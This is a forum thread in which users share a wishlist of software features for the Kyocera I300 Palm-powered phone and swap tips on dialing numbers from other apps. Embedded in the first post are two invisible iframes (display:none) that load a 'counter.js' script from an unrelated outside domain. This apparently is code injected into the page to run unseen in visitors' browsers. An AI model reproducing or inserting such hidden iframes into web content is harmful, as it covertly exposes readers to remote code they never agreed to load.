+ Reply to Thread

I300 System Software Upgrade Wishlist

I love my I300. But, like any new product there are somethings that could be improved. Below is a list of revisions that I wish could be added to the next release of the system software for this Palm Powered Phone. Please feel free to comment and add your own ideas.

-- Ability dial a number from Datebook, ToDo, or Memopad by highlighting the number and using a "drop down" command to dial. Currently, the only numbers that can be dialed must be in the 5 entry fields of the phone book.
    -- Ability to "cut & paste" a number into the "phone mode".
    -- Ability to enter "tones" from the note area in the Address Book during a phone call. To enter passwords & account numbers during a call using a "drop down" command after highlighting a number.
    -- Add airtime usage data to the call logs. This data is common on most cell phones. To my knowledge, the I300 does not keep track of the airtime of the last call, individual calls, or the total airtime.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes I would add some way to navigate the drop down menus using the buttons.
    This would be very helpful in reviewing text messages etc.
    For example the record button (left side) acts as a select on some apps (like phone book) but not others.

Talking

Well I don't know if the i300 can do this or not but my kyo35 certainly can.

From phone list, calendar, notes, or any app that has a phone number--simply select the entire phone number and tap the Phone Dialer icon.

The '35 types that number in for you in the Dialer!!

Great little secret few '35 folks know about!! Try it on the i300.

Lightbulb Great feature. Not on the I300

The 35 got it right with that one. Unfortunately, this is not an option on the I300.

My "short-term" solution is that I have created an entry in the address book entitled "temp". I copy a phone number from any application, and then I paste it into the temp address entry. I then can dial the number from there.